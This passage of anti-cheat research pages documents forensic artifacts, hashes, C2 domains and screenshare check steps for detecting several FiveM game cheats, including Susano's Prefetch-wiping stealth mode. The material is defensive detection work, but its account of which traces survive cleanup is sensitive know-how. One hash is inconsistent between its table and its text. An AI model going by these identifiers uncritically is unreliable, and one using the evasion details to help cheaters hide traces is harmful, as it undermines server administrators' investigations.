vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Ambani FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Ambani FiveM cheat detection & forensic artifacts ================================================= Ambani is a FiveM-targeted cheat with a known SHA-256 fingerprint. The binary is identified by hash c56f83f54e6ad7fcdd060592ebb8d794cfb9c1ba955f97028cfc6d69d30fea32. Standard execution artifacts including PcaSVC entries and Prefetch records provide persistent post-session evidence of loader execution. CR Clubhouse AC Research June 2, 2026 6 min read Summary * SHA-256 c56f83f54e6ad7fcdd060592ebb8d794cfb9c1ba955f97028cfc6d69d30fea32 provides unambiguous binary identification. * PcaSVC and Prefetch entries persist after execution and provide timestamped execution evidence. * Browser history and Discord authorizations may reference Ambani distribution channels. Overview -------- Ambani is a FiveM cheat identified through hash-based analysis. The binary carries a SHA-256 fingerprint of c56f83f54e6ad7fcdd060592ebb8d794cfb9c1ba955f97028cfc6d69d30fea32. Like many FiveM cheats, it relies on standard Windows execution paths that leave recoverable artifacts in PcaSVC logs, Prefetch, and application compatibility databases. Sample metadata (IOC) --------------------- Ambani — file indicatorsIOC Name Ambani (FiveM cheat) SHA-256 c56f83f54e6ad7fcdd060592ebb8d794c fb9c1ba955f97028cfc6d69d30fea32 Behavioral indicators --------------------- ### Execution artifacts When Ambani is executed, Windows creates standard application compatibility artifacts. PcaSVC logs the first execution in the AppCompat database, and a Prefetch file is written to C:\\Windows\\Prefetch. These records persist independently of whether the user attempts to clean up the executable. ### Hash-based attribution Because the executable name may vary across distribution channels, the SHA-256 hash is the primary attribution indicator. Confirm the hash against the known value before attributing a suspect file to Ambani. Screenshare check guide ----------------------- 1 ### File hash verification * If a suspect file is present on disk, compute its SHA-256. * Match against c56f83f54e6ad7fcdd060592ebb8d794cfb9c1ba955f97028cfc6d69d30fea32. 2 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for entries referencing the Ambani executable. * The timestamp provides a first-execution record that cannot be cleared without registry editing. 3 ### Prefetch records * Check C:\\Windows\\Prefetch for entries matching the executable name used by Ambani. 4 ### Browser and Discord * Check browser history and downloads for references to Ambani. * In Discord, check **User Settings → Authorized Apps** for any Ambani-related authorisations. Detection summary ----------------- Artifact matrix — AmbaniSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────── PcaSVC entry Yes AppCompat / DPS log SHA-256 hash match Yes (file on disk) File system Prefetch record Usually C:\\Windows\\Prefetch Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Xine FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Xine FiveM cheat detection & forensic artifacts =============================================== Xine is a free FiveM-targeted cheat distributed under the executable name XineTeamCheat.exe. It has also been observed masquerading as NordVPN. Its most accessible artifact is a config.json file written to the user's Desktop, alongside Journal Trace entries, Prefetch records, and session-length Event Viewer logs. CR Clubhouse AC Research June 2, 2026 7 min read Summary * config.json written to the user's Desktop — a persistent configuration artifact created by Xine with no legitimate origin in that location. * Also distributed as a NordVPN masquerade — executable may appear as NordVPN in the process list; verify the true binary name. * Journal Trace records XineTeamCheat.exe activity; Prefetch typically persists after execution. * Event Viewer logs are present for the duration of the session; process list entry is only visible while the cheat is running. Overview -------- Xine is a free, publicly distributed FiveM cheat loader. Its primary executable is named XineTeamCheat.exe and has been observed distributed under a NordVPN masquerade, meaning the process may appear with that name in a superficial process-list review. No C2 domain has been documented for this variant, and no DPS or PcaSvc timestamps have been confirmed. The most accessible and distinctive artifact is a config.json file written directly to the user's Desktop. This file persists after the cheat closes, is visible in Explorer without any specialist tooling, and has no legitimate origin in that path. Combined with Journal Trace entries and Event Viewer records, Xine leaves a reliable forensic footprint across multiple independent artifact sources. Sample metadata (IOC) --------------------- No cryptographic hashes, C2 domains, DPS timestamps, or PcaSvc entries have been confirmed for Xine at the time of publication. The primary file indicators are documented below. XineTeamCheat.exe — file indicatorsIOC Name XineTeamCheat.exe (also distributed as NordVPN masquerade) Hashes Not yet confirmed C2 None documented DPS Not provided PcaSvc Not provided Key artifact config.json on user Desktop The absence of confirmed hashes does not diminish detectability. The config.json Desktop artifact and Journal Trace entries provide strong attribution without relying on hash matching. Behavioral indicators --------------------- ### Loader UI When active, the Xine loader displays a visible UI. The following screenshot shows the loader open and operational, confirming injection is in progress. ### config.json on Desktop Xine writes a config.json file to the user's Desktop. This file contains cheat configuration data and persists after the process exits. It is immediately visible in Explorer and is the fastest artifact to verify during a screenshare — no specialist tooling is required. ### Event Viewer entries Windows Event Viewer records entries associated with Xine for the duration of the session. These logs are session-length and may be cleared after the cheat closes, but will be present during an active screenshare. Screenshare check guide ----------------------- Work through these steps in order. Step 1 targets the Journal Trace entry, which is the most forensically reliable artifact. Step 3 targets the Desktop config file, which requires no tooling beyond Explorer. 1 ### Journal Trace for XineTeamCheat.exe * Open a Journal Trace tool and search for XineTeamCheat. * Look for file creation or execution events. This trace persists independently of Prefetch and confirms the executable was run from this machine. 2 ### Prefetch folder check * Navigate to C:\\Windows\\Prefetch and look for a XINETEAMCHEAT.EXE-\*.pf entry. * Prefetch typically persists after execution. There is no legitimate process with this name in any standard Windows installation. 3 ### Desktop config.json * Navigate to the user's Desktop (or run dir %USERPROFILE%\\Desktop\\config.json). * The presence of config.json on the Desktop is the fastest and most visible artifact of Xine. Open it in Notepad to confirm cheat configuration content. 4 ### Event Viewer * Open Event Viewer and check the Windows Logs for entries related to Xine or XineTeamCheat.exe. * These entries are session-length and may be absent if the session ended before the screenshare, but will be visible during an active session. 5 ### Process list — XineTeamCheat.exe or NordVPN masquerade * Open Task Manager or System Informer and search for XineTeamCheat.exe. * Also check for any suspicious NordVPN process — Xine has been distributed under this masquerade. If a NordVPN process is found but NordVPN is not installed, verify the true binary path to confirm it is Xine. Detection summary ----------------- Artifact matrix — Xine / XineTeamCheat.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── config.json on Desktop Yes %USERPROFILE%\\Desktop Journal Trace (XineTeamCheat) Yes Journal Trace tool Prefetch (XineTeamCheat.exe) Usually C:\\Windows\\Prefetch Event Viewer entries Session-length Event Viewer logs Process (XineTeamCheat / NordVPN) Only while running Task Manager / SI The most immediately actionable indicator is the **config.json file on the user's Desktop**, which requires no specialist tooling and persists after the cheat exits. Journal Trace and Prefetch provide corroborating execution records. The NordVPN masquerade variant requires careful verification of the underlying binary path if NordVPN is not genuinely installed. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # MrCheat / Turkish Kebab FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished MrCheat / Turkish Kebab FiveM cheat detection & forensic artifacts ================================================================== MrCheat (also marketed as Turkish Kebab) is a FiveM-targeted cheat loader distributed as Loader.exe. It communicates with api.mrcheat.api-ir for license validation. The binary carries a distinctive SHA-1 fingerprint and leaves a PcaSVC entry at offset 0x1b0000 as a persistent execution record. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Distributed as Loader.exe — a generic name shared across many cheat loaders; distinguish by hash and C2. * C2 endpoint api.mrcheat.api-ir observed in LSASS memory and DNS cache during active sessions. * SHA-1 5c568ed13cae97ab5bb20fbe3e70032d610c4f2f provides unambiguous binary identification. * PcaSVC execution record survives user-side cleanup and confirms first execution time. Overview -------- MrCheat, marketed under the alias Turkish Kebab, is a commercially distributed FiveM cheat. Its primary executable is named Loader.exe — a generic filename shared with many other loaders — making hash and C2 confirmation necessary for attribution. The loader contacts api.mrcheat.api-ir for license validation and payload delivery. Because the filename is generic, Prefetch entries alone are insufficient for attribution. The C2 domain string appearing in LSASS memory or DNS cache combined with the SHA-1 hash provides definitive identification. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. Loader.exe — file indicatorsIOC Name Loader.exe Alias Turkish Kebab / MrCheat SHA-1 5c568ed13cae97ab5bb20fbe3e70032d610c4f2f C2 domain api.mrcheat.api-ir → Observed in: DNS cache, lsass.exe Behavioral indicators --------------------- ### C2 communication via api.mrcheat.api-ir Upon execution, MrCheat contacts api.mrcheat.api-ir for license validation. This domain string is observable in the DNS cache and in LSASS process memory as a residual from injection or inter-process communication. The domain is not associated with any legitimate software. ### Generic loader filename The executable name Loader.exe is deliberately generic. A process list or Prefetch entry alone cannot attribute the file to MrCheat without hash confirmation or C2 observation. During a live session, check DNS and memory first; for post-session investigation, confirm the SHA-1 hash. ### PcaSVC execution record Windows Program Compatibility Assistant records a PcaSVC entry for Loader.exe at first execution. This entry persists in the AppCompat database and is not cleared by standard user-side cleanup. It provides a timestamp-anchored record of when the loader was first run. Screenshare check guide ----------------------- Work through these steps in order. Steps 1–2 are fastest during a live session. Steps 3–5 cover persistent artifacts for post-session investigation. 1 ### DNS cache — api.mrcheat.api-ir * Run ipconfig /displaydns or check System Informer's DNS section. * Search for mrcheat. A cache hit confirms an outbound connection during the current or recent session. 2 ### LSASS memory scan * In System Informer, scan lsass.exe memory strings for mrcheat. * The C2 domain string in LSASS confirms active loader injection. 3 ### Process list — Loader.exe * Check Task Manager or System Informer for a running Loader.exe process. * Note: many cheats use this name — confirm by checking the executable path and hash before attributing. 4 ### File hash verification * If Loader.exe is present on disk, compute its SHA-1. * Match against 5c568ed13cae97ab5bb20fbe3e70032d610c4f2f for definitive attribution to MrCheat. 5 ### PcaSVC / AppCompat entry * Inspect the AppCompat PcaSVC log for an entry referencing Loader.exe. * Cross-reference the timestamp and path with other indicators to confirm MrCheat attribution. 6 ### Browser and Discord * Check browser history and downloads for references to mrcheat or Turkish Kebab. * In Discord, check **User Settings → Authorized Apps** for related authorisations. Detection summary ----------------- Artifact matrix — MrCheat / Loader.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC entry (Loader.exe) Yes AppCompat / DPS log SHA-1 hash match Yes (file on disk) File system DNS cache (api.mrcheat.api-ir) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan The most actionable live indicator is the **api.mrcheat.api-ir domain in DNS cache or LSASS memory**. For post-session investigation, the SHA-1 hash provides unambiguous attribution if the file remains on disk. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Susano FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Susano FiveM cheat detection & forensic artifacts ================================================= Susano is a FiveM-targeted cheat loader distributed as lemon.exe. It injects into the FiveM game process, communicates with a C2 endpoint at api.susano.re, and employs an active stealth mode that purges Prefetch entries and generates randomly-named DLL staging folders on the system drive to evade detection. This page documents all known forensic artifacts and provides a step-by-step screenshare check guide. CR Clubhouse AC Research June 1, 2026 10 min read Summary * C2 domain api.susano.re found resident in lsass.exe (14 string matches) and svchost.exe (4 matches) during active sessions. * FiveM process working set inflated by ~40 MB over baseline (115 MB+ vs. ~75 MB clean) with injected WCX-protected memory regions. * Stealth mode actively deletes Prefetch entries — an empty Prefetch Journal Trace record is a reliable indicator of activation. * USN Journal preserves lemon.exe file-system events even after stealth mode cleans Prefetch. Overview -------- Susano is a commercially sold FiveM cheat loader. Its primary executable is named lemon.exe and weighs approximately 26.6 MB. Once launched, it injects code into the running FiveM game process and establishes an outbound connection to api.susano.re for license validation and feature delivery. Susano includes a dedicated stealth mode that attempts to erase execution evidence after use. Despite this, several artifact categories survive the cleanup sweep and provide reliable detection signals across Discord, browser history, the Windows USN Journal, process memory, and the NVIDIA application registry. Sample metadata (IOC) --------------------- The following file was recovered and submitted to the research corpus. Hash values can be used to match the exact build across scanning platforms. lemon.exe — file indicatorsIOC Name lemon.exe Size 27,938,605 bytes (26.6 MB) SHA-256 67d49298255a2a1bd44cbcea4d6a7fa99ae9f08459e613bb7db3122fb355b4f9 SHA-1 cdcb51288fb44d2a2365a0b201cffe072286519e MD5 696b84dad66424ff8c92a6fd0a34481b First seen 2025-04-17 14:46:56 UTC (DPS timestamp) PcaSVC 0x3bbd000 C2 domain api.susano.re → Observed in: lsass.exe, svchost.exe, FiveM\_GTAProcess.exe The DPS (Program Compatibility Assistant service) timestamp of 2025-04-17 14:46:56 records the first time Windows registered execution of this build. It is written automatically by PcaSvc and persists independently of the cheat's own cleanup routines, making it a reliable first-seen marker even after Prefetch has been wiped. Behavioral indicators --------------------- ### Stealth mode — Prefetch deletion Susano's stealth mode actively deletes Prefetch entries for its own executables after injection completes. When performing a Journal Trace on the Prefetch folder, an entirely empty result set is the primary indicator that stealth mode was invoked — legitimate Prefetch folders always contain entries for recently executed processes. Despite this, the USN Journal record for lemon.exe itself is not erased (see [USN Journal evidence](https://clubhouseac.shop/research/susano-fivem-detection#usn-journal) ), and the PcaSVC AppCompatFlags entry survives independently. ### Random-name staging folders During injection, Susano generates DLL payloads inside randomly-named folders on the root of the system drive (e.g., C:\\xk9m2r\\, C:\\a7b2k9\\). These folders contain the staged DLLs and, conditionally, a favorites.cfg configuration file. The folders are created rapidly at injection time and are the most visible on-disk artifact left after stealth mode runs. The favorites.cfg file is only written when the user explicitly saves their in-cheat settings — it will not be present on every machine. Running a Journal Trace with the filter favorites is the fastest way to locate it if it exists. ### FiveM working set inflation Susano inflates the memory footprint of the FiveM game process (FiveM\_GTAProcess.exe) by injecting additional code sections. The injected regions are identifiable in System Informer by their WCX (Write / Copy / Execute) memory protection flags — a combination that is not produced by the legitimate FiveM runtime. ~75 MB Clean FiveM baseline (Total WS) 115 MB+ Susano-injected FiveM (Total WS) ~40 MB Injected overhead (delta) Memory artifacts ---------------- Live memory scans on an active Susano session show the C2 domain string api.susano.re resident in multiple unrelated system processes. This cross-process presence is characteristic of a loader that uses reflective injection or shellcode stubs that carry the domain string as an embedded constant. ### lsass.exe — 14 string matches The Windows Local Security Authority (lsass.exe) process is not a target of the cheat, but its memory pages show 14 instances of the C2 domain across two base addresses. The string variants observed include api.susano.re0Y0, api.susano.re0, and api.susano.re. ### svchost.exe — 4 string matches A svchost.exe instance (PID 1796) shows 4 additional matches of the C2 domain across two separate base addresses. The presence in a service host process is consistent with a loader that enumerates or targets multiple host processes during injection. USN Journal evidence -------------------- The NTFS USN (Update Sequence Number) Change Journal records file-system events independently of Prefetch and is not targeted by Susano's stealth mode sweep. The following records were recovered from a subject machine after stealth mode had already cleared the Prefetch folder: USN Journal — lemon.exe eventsEvidence USN Name Date / Time ──────────────────────────────────────────────── 24893964120 lemon.exe 28.04.2025 16:01:19 24893964200 lemon.exe 28.04.2025 16:01:19 24893964832 lemon.exe 28.04.2025 16:01:21 Three sequential records within two seconds confirm file system activity for lemon.exe. The cluster of events in a short window is consistent with initial file write, attribute change (e.g., execution flag), and close operations — matching the execution pattern of a loader writing a staged copy before running it. Screenshare check guide ----------------------- The following steps constitute a systematic screenshare (SS) investigation for Susano. Work through each section in order — earlier checks are faster and may provide enough evidence on their own, but the later steps are needed to catch stealth-mode-cleaned machines. 1 ### Discord & browser * In Discord, navigate to **User Settings → Authorized Apps** and check whether any application named _Susano_ or referencing susano.re appears in the list. * Open the browser history and review both page visits and downloaded files. Search for susano.re and inspect any matching entries for downloaded executables or installer files. 2 ### Explorer & Journal Trace (drive C:) * Search drive C: for the file favorites.cfg. Susano writes its user configuration to this filename inside a randomly-named staging folder. * Run a Journal Trace on drive C: with favorites as the search term to locate the exact folder path. The folder name will be a short random alphanumeric string (e.g., C:\\a7b2k9\\). * If the folder is found, note its full path — it confirms a Susano install even if the executables have been removed. Be aware that the config folder is only present when the user actively saved their settings. 3 ### System Informer * Open System Informer and navigate to **Explorer (section 5)**. Select all entries and search for hwid.exe — Susano ships a hardware ID utility under this name. * Switch to **Browser (section 4)**, select all entries, and search for susano.re to surface any cached or residual browser data not visible in standard history. 4 ### NVIDIA Control Panel & Data Usage * Open the NVIDIA Control Panel and navigate to the **Add** application section. Scroll through the full list of registered executables and look for any suspicious or unrecognised entries — Susano may register itself here to persist NVIDIA overlay state across sessions. * Open **Windows Settings → Network & Internet → Data Usage** and search for Lemon.exe. Any recorded network usage confirms the loader was executed and made outbound connections. 5 ### Prefetch folder Journal Trace * Run a Journal Trace specifically targeting the Prefetch folder (C:\\Windows\\Prefetch). * If the result is completely empty — no records returned — this is a strong indicator that Susano's stealth mode was activated and actively deleted the folder contents. An empty Prefetch Journal record does not occur under normal Windows operation. 6 ### FiveM working set (System Informer) * Open System Informer and locate the FiveM\_GTAProcess.exe process. * Switch to the **Memory** tab and check the **Total WS** (Working Set) value. * Compare against the baseline table below. If Total WS significantly exceeds 75 MB, inspect the individual memory regions for entries with WCX (Write / Copy / Execute) protection — these are the injected code segments. FiveM Total WS baseline vs. injected State Total WS Signal ───────────────────────────────────── Clean FiveM ~75 MB None Susano injected 115 MB+ WCX regions present 7 ### USN Journal — lemon.exe * Run a Journal Trace on drive C: with the term lemon. Even if Prefetch and Amcache have been cleared, USN records for lemon.exe will remain unless the entire change journal was purged (a far more aggressive and detectable action). * Three or more USN events within a few seconds confirm loader execution via the file write / attribute-change / close sequence. Detection summary ----------------- Artifact matrix — Susano / lemon.exeSummary Artifact Survives stealth mode? Check location ─────────────────────────────────────────────────────────────────────── PcaSVC AppCompat timestamp Yes Registry / DPS log USN Journal (lemon.exe) Yes Drive C: journal trace favorites.cfg folder Yes (if settings saved) Random root folder on C: Prefetch entries No (wiped) Absence is the signal Browser history (susano.re) Partial Browser + Informer Discord Authorized Apps Partial Discord settings NVIDIA app registry Often NVIDIA Control Panel FiveM WS inflation Only while running System Informer memory tab C2 strings in memory Only while running Memory string scan Data Usage (lemon.exe) Yes Windows Settings The most reliable post-cleanup indicators are the **PcaSVC timestamp**, the **USN Journal records** for lemon.exe, and the **absence of Prefetch records** (which is itself the signal when stealth mode has run). A complete check combining all seven steps above has no known blind spots against the current build. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # D3d10.dll FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished D3d10.dll FiveM cheat detection & forensic artifacts ==================================================== D3d10.dll is a DLL-based FiveM cheat that borrows its filename from the legitimate Microsoft DirectX component d3d10.dll as a deliberate masquerade. Key artifacts include a browser download record, FiveM crash dump, Echo Journal trace, Windows Defender detection via WinDefView, and System Informer Explorer evidence of the DLL loaded into a browser process. CR Clubhouse AC Research June 2, 2026 7 min read Summary * Masquerades as the legitimate d3d10.dll DirectX component — verify file path and digital signature before dismissing it as benign. * Browser download record is typically recoverable, providing a timestamp and source URL for the malicious DLL acquisition. * FiveM generates a crash dump when the injected DLL causes instability — the dump is stored in the FiveM crash folder and references the DLL name. * Windows Defender flags the DLL; WinDefView detection history and Echo Journal trace both survive basic cleanup. Overview -------- D3d10.dll is an injected DLL-based FiveM cheat. Its filename mirrors the legitimate Microsoft DirectX component d3d10.dll, which is a standard Windows system file located in C:\\Windows\\System32\\. The cheat DLL is not placed in the System32 directory — it is typically downloaded to a user directory and injected manually or via a loader. The masquerade is detectable by verifying the file path and digital signature of any flagged d3d10.dll instance. A legitimate DirectX DLL will be located in System32, signed by Microsoft, and have a known file size. The cheat DLL will fail one or more of these checks and will be flagged by Windows Defender. Sample metadata (IOC) --------------------- No cryptographic hashes have been confirmed for this DLL variant at the time of publication. Detection relies on behavioral and contextual indicators rather than static file signatures. d3d10.dll cheat — file indicatorsIOC Name d3d10.dll (DirectX DLL masquerade — not the legitimate System32 component) SHA-256 not provided SHA-1 not provided MD5 not provided DPS not provided PcaSvc not provided C2 domain none documented Key check File path + digital signature verification Always confirm the path of a flagged d3d10.dll. A legitimate instance lives in C:\\Windows\\System32\\ and is Microsoft-signed. Any instance outside that path, or lacking a valid Microsoft signature, should be treated as suspicious. Behavioral indicators --------------------- ### Browser download record The cheat DLL is typically acquired via a browser download. The browser download history will contain a record of the file acquisition, including the source URL and download timestamp, which survives basic file cleanup if the browser history has not been wiped. ### FiveM crash dump When the injected DLL causes FiveM instability, the game client generates a crash dump file in its crash reporting folder. This dump references the injected DLL by name and provides a persistent record of injection activity. ### Echo Journal trace The Echo Journal tool records filesystem events for the DLL, providing a timestamped record of creation, access, and modification events for d3d10.dll at its non-System32 path. ### Windows Defender / WinDefView detection Windows Defender flags the cheat DLL. The detection history is accessible via WinDefView and persists after the file is quarantined or deleted, providing a reliable historical record of the Defender alert. ### System Informer — DLL in browser process System Informer Explorer can enumerate loaded DLLs across all processes. The cheat DLL is observed loaded into a browser process, confirming injection and providing the non-System32 file path of the malicious DLL. Screenshare check guide ----------------------- Work through these steps in order. Step 1 targets the running DLL directly. Steps 2–5 cover historical evidence that persists after the session ends. 1 ### System Informer Explorer — search d3d10.dll * Open System Informer and use the Explorer / DLL search to look for any loaded instance of d3d10.dll. * A legitimate instance will be located in C:\\Windows\\System32\\ and signed by Microsoft. Any other path is suspicious. * If found outside System32, verify the digital signature — it will be absent or from an unknown signer. 2 ### Journal trace for d3d10 * Run a Journal Trace search for d3d10. * Filter results to exclude the legitimate System32 path. Any creation event outside C:\\Windows\\System32\\ is suspicious. 3 ### Windows Defender / WinDefView history * Open Windows Defender Security Center or WinDefView and check the protection history for any detection referencing d3d10.dll. * A Defender detection record persists after quarantine or deletion and constitutes definitive evidence of the malicious DLL being present. 4 ### Browser download history for d3d10.dll * Check the browser download history for any entry referencing d3d10.dll or a cheat distribution URL. * The download record will contain the source URL, filename, and timestamp of acquisition. 5 ### FiveM crash dump folder * Navigate to the FiveM crash dump directory (typically %LOCALAPPDATA%\\FiveM\\FiveM.app\\logs or a crash subfolder). * Open any recent crash dump and search for d3d10 — the injected DLL name will appear in the module list of the dump. Detection summary ----------------- Artifact matrix — d3d10.dll cheatSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── WinDefView / Defender history Yes Windows Security / WinDefView Journal trace (d3d10.dll) Yes Echo Journal / NTFS journal Browser download record Yes (if not wiped) Browser history FiveM crash dump Yes FiveM crash folder System Informer DLL list Only while running System Informer Explorer The most reliably persistent indicator is the **Windows Defender detection history** via WinDefView, which persists after the DLL is quarantined or deleted. The journal trace and browser download record provide corroborating historical evidence. System Informer is decisive only if the DLL is still loaded. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Kazo FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Kazo FiveM cheat detection & forensic artifacts =============================================== Kazo is a FiveM-targeted cheat with a confirmed VirusTotal detection profile. Its presence on disk is readily located via the Everything tool, and its file properties expose a distinctive signature. Hash indicators and prefetch records provide reliable persistent evidence of execution. CR Clubhouse AC Research June 2, 2026 7 min read Summary * VirusTotal detections confirmed — SHA-256 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727 is flagged by multiple AV engines. * File properties expose anomalous metadata inconsistent with any legitimate Windows or game component. * The Everything tool rapidly locates the Kazo binary on disk regardless of folder location. * Prefetch folder records execution history and survives standard user-side cleanup. Overview -------- Kazo is a commercially distributed FiveM cheat. It has an established VirusTotal detection profile with multiple AV engine hits, making hash-based identification straightforward. Its file properties carry distinctive metadata that differentiates it from legitimate software at a glance. The Everything tool is particularly effective for locating the Kazo binary on disk regardless of where the user has stored it. Combined with prefetch records and hash verification, Kazo leaves a robust and cleanup-resistant forensic trail. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. Kazo cheat — file indicatorsIOC SHA-256 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727 SHA-1 1cdb0035e19acb20e81b4cd05607e8e1aacafd88 MD5 a6366805d6a2d49ca5478875fc3d77a3 The SHA-256 value 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727 is the primary identifier for cross-referencing against VirusTotal and other threat intelligence platforms. Behavioral indicators --------------------- ### VirusTotal detections The Kazo binary receives detections from multiple AV engines on VirusTotal. Submitting the SHA-256 hash directly to VirusTotal will return the current detection verdict without needing to upload the file. ### File properties The file properties of the Kazo binary reveal anomalous metadata. Right-clicking the executable and opening Properties exposes version information and signing details that are inconsistent with any legitimate application. ### Everything tool file location The Everything tool (by voidtools) provides instant filesystem search and is highly effective for locating the Kazo binary regardless of where it has been placed on disk. Searching for the known filename or partial strings in the Everything index will surface the file immediately. Screenshare check guide ----------------------- Work through these steps in order. Step 1 provides the fastest definitive identification via hash lookup. Steps 2–4 cover on-disk presence and execution history. 1 ### VirusTotal hash check * Submit the SHA-256 hash 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727 to VirusTotal. * A detection result confirms the presence of the known Kazo binary. No file upload is required — hash lookup is sufficient. 2 ### Everything tool search * Open the Everything tool and search for Kazo-related filenames. * The tool will instantly surface any matching files across all indexed drives, regardless of folder depth or obfuscated placement. 3 ### File properties analysis * Right-click any located binary and open Properties. * Check the Details tab for version information, product name, and company fields. Legitimate software will have consistent, verifiable metadata. Anomalous or blank fields are a red flag. 4 ### Prefetch folder check * Navigate to C:\\Windows\\Prefetch and look for any prefetch entry matching the Kazo executable name. * A prefetch entry confirms that the binary was executed on this system and provides a timestamp of the most recent run. Detection summary ----------------- Artifact matrix — Kazo FiveM cheatSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── VirusTotal hash match N/A (remote) virustotal.com hash search Everything tool file location Until deletion Everything search index File properties metadata Until deletion Right-click → Properties Prefetch record Usually C:\\Windows\\Prefetch The most immediately actionable indicator is the **VirusTotal SHA-256 hash match**. Submitting 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727 to VirusTotal returns a definitive verdict. On-disk presence is rapidly confirmed via the Everything tool, and prefetch records provide persistent execution history. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Bang Service TriggerBot FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Bang Service TriggerBot FiveM cheat detection & forensic artifacts ================================================================== Bang Service TriggerBot is a FiveM-targeted triggerbot distributed as Bang\_Keyboardtweak.exe. The distinctive executable name — combining the Bang brand with a keyboard tweak reference — is itself a strong indicator. SHA-256 9ee8d3d053d3891c480dd591cbf54fbfd336d976d61fe38d705ad22873f02144 provides unambiguous binary identification. CR Clubhouse AC Research June 2, 2026 6 min read Summary * Executable name Bang\_Keyboardtweak.exe is distinctive and not associated with any legitimate software. * SHA-256 9ee8d3d053d3891c480dd591cbf54fbfd336d976d61fe38d705ad22873f02144 provides definitive binary identification. * Prefetch entry for Bang\_Keyboardtweak.exe is unambiguous — no legitimate process uses this name. * PcaSVC execution record provides timestamped evidence of first execution. Overview -------- Bang Service TriggerBot is a FiveM triggerbot — a cheat that automatically fires when the crosshair is over an enemy hitbox. It is distributed under the executable name Bang\_Keyboardtweak.exe, a name that references the Bang brand and keyboard hook mechanism used by the cheat. Unlike cheats distributed with generic names, Bang Service TriggerBot's executable name is immediately suspicious — there is no legitimate software that would be named Bang\_Keyboardtweak.exe. A Prefetch entry or process list entry with this name requires no further investigation to flag. Sample metadata (IOC) --------------------- Bang\_Keyboardtweak.exe — file indicatorsIOC Name Bang\_Keyboardtweak.exe Type TriggerBot / FiveM cheat SHA-256 9ee8d3d053d3891c480dd591cbf54fbd fd336d976d61fe38d705ad22873f02144 Behavioral indicators --------------------- ### Distinctive executable name The filename Bang\_Keyboardtweak.exe is specific to this cheat. Any system where this name appears in Prefetch, the process list, or recent file access logs is confirmed as having executed Bang Service TriggerBot. The name has no legitimate counterpart in Windows or any standard software package. ### Keyboard hook behavior Triggerbots typically install low-level keyboard and/or mouse hooks to intercept input and inject synthetic fire commands. During an active session, a keyboard hook registered to Bang\_Keyboardtweak.exe is observable in System Informer's hooks view. ### PcaSVC execution record Windows PcaSVC logs the first execution of Bang\_Keyboardtweak.exe in the AppCompat database. This entry is not cleared by standard user-side cleanup. Screenshare check guide ----------------------- 1 ### Prefetch — Bang\_Keyboardtweak.exe * Check C:\\Windows\\Prefetch for BANG\_KEYBOARDTWEAK.EXE-\*.pf. * Any match is definitive — this filename has no legitimate origin. 2 ### Process list * Check Task Manager or System Informer for a running Bang\_Keyboardtweak.exe process. 3 ### System hooks * In System Informer, check the global hooks panel for any hook registered by Bang\_Keyboardtweak.exe. 4 ### File hash verification * If the file is present on disk, compute its SHA-256. * Match against 9ee8d3d053d3891c480dd591cbf54fbfd336d976d61fe38d705ad22873f02144. 5 ### PcaSVC / AppCompat entry * Inspect the PcaSVC log for an entry referencing Bang\_Keyboardtweak.exe. 6 ### Browser and Discord * Check browser history and downloads for references to Bang Service or Bang TriggerBot. * In Discord, check **User Settings → Authorized Apps**. Detection summary ----------------- Artifact matrix — Bang Service TriggerBotSummary Artifact Survives cleanup? Check location ───────────────────────────────────────────────────────────────────────── PcaSVC entry Yes AppCompat / DPS log Prefetch (Bang\_Keyboardtweak.exe) Usually C:\\Windows\\Prefetch SHA-256 hash match Yes (file on disk) File system Process / hook (if running) Only while running Task Manager / SI The most immediately actionable indicator is the **Prefetch entry for Bang\_Keyboardtweak.exe** — the filename is unique to this cheat and requires no additional confirmation. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact 